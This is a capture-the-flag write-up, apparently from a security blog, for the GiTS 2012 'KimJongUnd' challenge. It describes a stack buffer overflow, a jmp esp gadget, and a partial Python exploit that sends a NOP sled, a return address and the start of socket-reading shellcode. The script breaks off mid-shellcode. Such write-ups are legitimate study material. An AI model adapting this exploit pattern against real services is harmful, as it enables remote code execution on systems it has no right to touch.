codezen.fr code hacking, zen coding

29Jan/12Off

GiTS 2012 KimJongUnd Write-Up

Stage 13

Question: KimJongUnd

We lost many time on this exploitation challenge for many reasons.

The vulnerability is when you input the command line after the password, there is a buffer overflow and you can control EIP.

Our buffer is on the stack so we spend some time finding a nice ROP gadget like this one:


.text:08048850 55 push ebp
.text:08048851 89 E5 mov ebp, esp
.text:08048853 FF E4 jmp esp
We have around 50 bytes available. Since we are in a forked daemon using socket we will first go for a shellcode that will read the command from the socket and output back to the socket.

#!/usr/bin/env python

import socket
import sys
import time

if len(sys.argv) != 3:
  print '\nUsage:\t./kim.py [host] [port]'
  sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)                         # Creating Socket
s.connect((host, port))                                                       # Connecting to socket
crash  = '\x90' * 524
crash += '\x50\x88\x04\x08'

crash += '\x31\xc9\x31\xdb\xb3\x04\x